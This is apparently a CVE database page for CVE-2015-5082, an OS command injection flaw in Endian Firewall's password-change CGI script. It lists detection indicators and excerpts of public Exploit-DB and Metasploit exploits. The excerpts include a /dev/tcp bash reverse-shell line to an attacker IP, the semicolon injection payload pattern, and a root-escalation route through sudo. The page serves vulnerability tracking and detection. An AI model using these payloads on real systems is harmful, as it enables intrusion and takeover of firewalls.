CVE-2015-5082
published 2015-09-28CVE-2015-5082: Endian Firewall before 3.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) NEW_PASSWORD_1 or (2) NEW_PASSWORD_2…
PriorityP276critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
69.91%
99.3th percentile
Endian Firewall before 3.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) NEW_PASSWORD_1 or (2) NEW_PASSWORD_2 parameter to cgi-bin/chpasswd.cgi.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| endian_firewall | endian_firewall | <= 2.5.1 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect POST requests to /cgi-bin/chpasswd.cgi with multipart/form-data bodies containing shell metacharacters (e.g., semicolons, pipes) in the NEW_PASSWORD_1 or NEW_PASSWORD_2 fields. ↗
- →The exploit payload is injected as: <EFW_PASSWORD>; <cmd>; — look for semicolon-delimited command injection patterns in the NEW_PASSWORD_1/NEW_PASSWORD_2 multipart form fields. ↗
- →Monitor for POST requests to /cgi-bin/chpasswd.cgi over HTTPS on port 10443 (the default Endian Firewall proxy management port). ↗
- →Alert on execution of /usr/local/bin/chrootpasswd by the 'nobody' account, which indicates post-exploitation privilege escalation via sudo on a compromised Endian Firewall. ↗
- →Detect outbound /dev/tcp reverse shell connections initiated from the Endian Firewall host (nobody process spawning a bash reverse shell via /dev/tcp). ↗
- ·Versions >= 3.0.0 contain the vulnerable code but it is never executed due to a bug in the CGI script; exploitation is not possible on these versions. ↗
- ·Versions 2.3.x and 2.4.0 are also not exploitable due to a separate bug in the CGI script. ↗
- ·Very early versions (e.g., 1.1 RC5) additionally require HTTP Basic Auth credentials to exploit; use USERNAME/PASSWORD options when targeting these versions. ↗
- ·The exploit does NOT change the proxy user's password on vulnerable systems, so exploitation may be stealthy with no visible account change. ↗
- ·Confirmed vulnerable EFW Community versions are 1.1 RC5, 2.0, 2.1, 2.2, 2.5.1, 2.5.2; any version from 1.1 RC5 to 2.2.x and 2.4.1/2.5.x should be considered at risk. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Endian Firewall - Password Change Command Injection (Metasploit)
exploitdb·2015-09-07
CVE-2015-5082 Endian Firewall - Password Change Command Injection (Metasploit)
Endian Firewall - Password Change Command Injection (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 'Endian Firewall Proxy Password Change Command Injection',
'Description' => %q{
This module exploits an OS command injection vulnerability in a
web-accessible CGI script used to change passwords for locally-defined
proxy user accounts. Valid credentials for such an account are
required.
Command execution will be in the context of the "nobody" account, but
this account had broad sudo permissions, including to run the script
/usr/local/bin/chrootpasswd (which changes the password for the Linux
root account on the system to the value specified by co
Exploit-DB
Endian Firewall < 3.0.0 - OS Command Injection
exploitdb·2015-06-29
CVE-2015-5082 Endian Firewall < 3.0.0 - OS Command Injection
Endian Firewall & /dev/tcp/" + reverseShellIP + "/" + reverseShellPort + " 0>&1;"
endianURL = "https://" + targetIP + ":" + targetPort + proxyUserPasswordChangeURI
conn = httplib.HTTPSConnection(targetIP, targetPort)
headers = {}
headers["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0"
headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
headers["Accept-Encoding"] = ""
headers["Referer"] = "https://" + targetIP + ":" + targetPort + proxyUserPasswordChangeURI
headers["Content-Type"] = "multipart/form-data; boundary=" + multipartDelimiter
headers["Accept-Language"] = "en-US,en;q=0.5"
headers["Connection"] = "keep-alive"
multipartDelimiter = "--" + multipartDelimiter
body = multipartDelimiter + "\r\n"
Exploit-DB
Endian Firewall < 3.0.0 - OS Command Injection (Metasploit)
exploitdb·2015-06-29
CVE-2015-5082 Endian Firewall < 3.0.0 - OS Command Injection (Metasploit)
Endian Firewall 'Endian Firewall %q{
This module exploits an OS command injection vulnerability in a
web-accessible CGI script used to change passwords for locally-defined
proxy user accounts. Valid credentials for such an account are
required.
Command execution will be in the context of the "nobody" account, but
on versions of EFW I tested, this account had broad sudo permissions,
including to run the script /usr/local/bin/chrootpasswd as root. This
script changes the password for the Linux root account on the system
to the value specified by console input once it is executed.
The password for the proxy user account specified will *not* be
changed by the use of this module, as long as the target system is
vulnerable to the exploit.
Very early versions of Endian Firewall (e.g. 1.1 RC5) req
Metasploit
Endian Firewall Proxy Password Change Command Injection
metasploit
Endian Firewall Proxy Password Change Command Injection
Endian Firewall Proxy Password Change Command Injection
This module exploits an OS command injection vulnerability in a web-accessible CGI script used to change passwords for locally-defined proxy user accounts. Valid credentials for such an account are required. Command execution will be in the context of the "nobody" account, but this account had broad sudo permissions, including to run the script /usr/local/bin/chrootpasswd (which changes the password for the Linux root account on the system to the value specified by console input once it is executed). The password for the proxy user account specified will *not* be changed by the use of this module, as long as the target system is vulnerable to the exploit. Very early versions of Endian Firewall (e.g. 1.1 RC5) require HTTP basic auth c
No writeups or analysis indexed.
http://packetstormsecurity.com/files/133469/Endian-Firewall-Proxy-Password-Change-Command-Injection.htmlhttp://www.rapid7.com/db/modules/exploit/linux/http/efw_chpasswd_exechttps://www.exploit-db.com/exploits/37426/https://www.exploit-db.com/exploits/37428/https://www.exploit-db.com/exploits/38096/http://packetstormsecurity.com/files/133469/Endian-Firewall-Proxy-Password-Change-Command-Injection.htmlhttp://www.rapid7.com/db/modules/exploit/linux/http/efw_chpasswd_exechttps://www.exploit-db.com/exploits/37426/https://www.exploit-db.com/exploits/37428/https://www.exploit-db.com/exploits/38096/
2015-09-28
Published